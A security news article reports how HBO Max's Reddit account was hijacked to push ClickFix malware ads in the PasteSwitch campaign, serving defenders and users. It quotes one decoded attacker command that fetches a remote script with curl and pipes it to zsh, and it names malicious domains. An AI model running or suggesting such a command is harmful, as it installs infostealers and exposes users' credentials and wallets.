Hackers Hijack HBO Max Reddit Account to Push ClickFix Malware Ads
Hackers compromised HBO Max’s official Reddit account and used it to distribute malicious ads that launched ClickFix attacks against Windows and macOS users. The campaign delivered information-stealing malware, cryptocurrency theft tools, and fake software applications.
Security researchers at Hudson Rock and ADAM Networks said a verified u/hbomax Reddit account was hijacked and used to publish 108 malicious ads over approximately 48 hours.
The ads used a social engineering technique known as ClickFix. Victims were tricked into copying and pasting malicious commands into Windows Run, PowerShell, or macOS Terminal while believing they were fixing an error, completing a CAPTCHA, or installing legitimate software.
ClickFix attacks are increasingly popular because they persuade victims to use legitimate operating system tools to execute the malware themselves. This can help attackers bypass some browser protections and security software designed to detect malicious downloads.
Some of the ads impersonated streaming services, while others promoted fake artificial intelligence tools, developer software, and macOS utilities.
Hudson Rock and ADAM Networks linked the activity to a larger campaign called PasteSwitch. The operation targets both Windows and macOS systems and distributes information stealers, loaders, cryptocurrency clippers, and fake cryptocurrency wallet applications.
According to the researchers, PasteSwitch refers to an operation in which victims paste attacker-provided commands into their systems. The attackers’ backend can then switch campaigns, platforms, payloads, and cryptocurrency theft methods depending on the visitor.
BleepingComputer contacted HBO and Warner Bros. Discovery with questions about the incident but did not receive a response.
Fake HBO Max macOS app delivers infostealing malware
The campaign was discovered after a Reddit user spotted an ad posted from a verified HBO Max account. The ad promoted what appeared to be a native HBO Max application for macOS.

Source: ADAM Networks
“I was browsing Reddit and saw an ad that listed
u/hbomaxas the author. It promoted the macOS HBO Max app, which I had never heard of and was interested in. The user is verified and appears to have posted multiple times on the official HBO Max subreddit,” the Reddit user warned.“Advertising directs you to
hbomaxx[.]us, which looks somewhat legitimate and has a join button/download. Clicking on these will open the classic infostealer/ClickFix prompt to paste this command to download. If checked, an executable file with other functionality for account compromise will be downloaded. Obviously, everything is done in a complete sandbox; it does not execute anything and only inspects the output.”
After clicking the ad, users were redirected to a convincing fake HBO Max website that claimed to offer a downloadable application.
One of the fake HBO Max domains used in the campaign was hbomaxx[.]us. However, clicking the download button did not install the application. Instead, visitors were instructed to open a terminal and paste a command to install the software.
One macOS command observed by BleepingComputer used Base64 encoding to conceal the command being executed. When decoded, it contained the following:
export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh
Hudson Rock identified ember-bridge[.]com as infrastructure used to deliver malware in the PasteSwitch operation in September.
MacSync and fake crypto wallets target macOS users
One malware family used in the attack was MacSync. Hudson Rock said the malware can steal browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords.
Another attack chain delivered an “AMOS helper” that established persistence using a directory named .com.apple.accountsd. The malware can then register the infected system with an attacker-controlled server and receive additional tasks.
The campaign also distributed fake Ledger, Trezor Suite, and Exodus cryptocurrency wallet applications designed to steal victims’ wallet recovery phrases.
PasteSwitch malware attacks Windows systems
On Windows systems, PasteSwitch has prompted victims to execute commands using mshta and PowerShell.
According to Hudson Rock, one Windows attack chain used MP3/HTA polyglots to create a scheduled task, launch 32-bit PowerShell, disable Microsoft’s Anti-Malware Scanning Interface (AMSI), and generate victim-specific infrastructure based on the computer name and username.
At a later stage, the attackers used obfuscated PowerShell and shellcode to load Amatera Stealer directly into memory without first saving the final payload to disk.
PasteSwitch has also been observed distributing cryptocurrency clipboard hijackers, including AnimateClipper and ZigClipper.
Compromised Reddit account promoted fake AI and developer tools
Researchers said the HBO Max ad was part of a broader advertising campaign run through the compromised Reddit account.
They identified 40 ads pointing to hbomaxx[.]app and promoting 36 fake AI and developer sites, including codex-craft[.]com. The researchers also identified 15 ads promoting apple[.]clean-disk-guide[.]com, 11 ads pointing to code-desktop[.]com, and six ads promoting hbomax-macos[.]com.
This enabled the attackers to target a broad audience, including HBO Max users, developers, people searching for AI software, and users looking for macOS system utilities.
After the malicious ads were reported, Reddit administrators suspended the ads. The researchers also reported them to Reddit’s security and safety team.
It remains unclear how the attackers gained access to the HBO Max Reddit account or whether other HBO or Warner Bros. Discovery accounts or systems were affected.
Join Mikko Hypponen and security leaders from the NFL, Chanel, and Atlassian for a two-hour digital summit about what will change with AI-speed attacks, what defenders should stop doing, and how to verify, decide, fix, and revalidate at machine speed.
Source: www.bleepingcomputer.com



